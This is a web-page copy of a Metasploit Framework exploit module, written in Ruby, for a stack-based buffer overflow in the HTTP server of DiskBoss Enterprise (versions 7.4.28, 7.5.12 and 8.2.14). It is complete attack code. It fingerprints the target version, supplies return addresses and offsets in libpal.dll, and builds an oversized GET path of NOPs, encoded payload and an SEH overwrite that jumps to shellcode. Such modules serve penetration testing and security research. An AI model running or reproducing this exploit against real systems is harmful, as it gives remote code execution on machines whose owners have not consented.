Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/http/diskboss_get_bof.rb
19664 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::Seh

10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'DiskBoss Enterprise GET Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack-based buffer overflow vulnerability

19
          in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,

20
          caused by improper bounds checking of the request path in HTTP GET

21
          requests sent to the built-in web server. This module has been

22
          tested successfully on Windows XP SP3 and Windows 7 SP1.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'vportal', # Vulnerability discovery and PoC

27
          'Ahmad Mahfouz',  # Vulnerability discovery and PoC

28
          'Gabor Seljan',   # Metasploit module

29
          'Jacob Robles'    # Metasploit module

30
        ],

31
        'References' => [

32
          ['EDB', '40869'],

33
          ['EDB', '42395']

34
        ],

35
        'DefaultOptions' => {

36
          'EXITFUNC' => 'thread'

37
        },

38
        'Platform' => 'win',

39
        'Payload' => {

40
          'BadChars' => "\x00\x09\x0a\x0d\x20",

41
          'Space' => 2000

42
        },

43
        'Targets' => [

44
          [

45
            'Automatic Targeting',

46
            {

47
              'auto' => true

48
            }

49
          ],

50
          [

51
            'DiskBoss Enterprise v7.4.28',

52
            {

53
              'Offset' => 2471,

54
              'Ret' => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]

55
            }

56
          ],

57
          [

58
            'DiskBoss Enterprise v7.5.12',

59
            {

60
              'Offset' => 2471,

61
              'Ret' => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]

62
            }

63
          ],

64
          [

65
            'DiskBoss Enterprise v8.2.14',

66
            {

67
              'Offset' => 2496,

68
              'Ret' => 0x1002A8CA  # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]

69
            }

70
          ]

71
        ],

72
        'Privileged' => true,

73
        'DisclosureDate' => '2016-12-05',

74
        'DefaultTarget' => 0,

75
        'Notes' => {

76
          'Reliability' => UNKNOWN_RELIABILITY,

77
          'Stability' => UNKNOWN_STABILITY,

78
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

79
        }

80
      )

81
    )

82
  end

83


84
  def check

85
    res = send_request_cgi(

86
      'method' => 'GET',

87
      'uri' => '/'

88
    )

89


90
    if res && res.code == 200

91
      if res.body =~ /DiskBoss Enterprise v(7\.4\.28|7\.5\.12|8\.2\.14)/

92
        return Exploit::CheckCode::Vulnerable

93
      elsif res.body =~ /DiskBoss Enterprise/

94
        return Exploit::CheckCode::Detected

95
      end

96
    else

97
      vprint_error('Unable to determine due to a HTTP connection timeout')

98
      return Exploit::CheckCode::Unknown

99
    end

100


101
    Exploit::CheckCode::Safe

102
  end

103


104
  def exploit

105
    mytarget = target

106


107
    if target['auto']

108
      mytarget = nil

109


110
      print_status('Automatically detecting the target...')

111


112
      res = send_request_cgi(

113
        'method' => 'GET',

114
        'uri' => '/'

115
      )

116


117
      if res && res.code == 200

118
        if res.body =~ /DiskBoss Enterprise v7\.4\.28/

119
          mytarget = targets[1]

120
        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/

121
          mytarget = targets[2]

122
        elsif res.body =~ /DiskBoss Enterprise v8\.2\.14/

123
          mytarget = targets[3]

124
        end

125
      end

126


127
      if !mytarget

128
        fail_with(Failure::NoTarget, 'No matching target')

129
      end

130


131
      print_status("Selected Target: #{mytarget.name}")

132
    end

133


134
    case mytarget

135
    when targets[1], targets[2]

136
      sploit = make_nops(21)

137
      sploit << payload.encoded

138
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)

139
      sploit << [mytarget.ret].pack('V')

140
      sploit << rand_text_alpha(2500)

141
    when targets[3]

142
      seh = generate_seh_record(mytarget.ret)

143
      sploit = payload.encoded

144
      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)

145
      sploit[sploit.length, seh.length] = seh

146
      sploit << make_nops(10)

147
      sploit << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode

148
      sploit << rand_text_alpha(5000 - sploit.length)

149
    else

150
      fail_with(Failure::NoTarget, 'No matching target')

151
    end

152


153
    send_request_cgi(

154
      'method' => 'GET',

155
      'uri' => sploit

156
    )

157
  end

158
end

159


160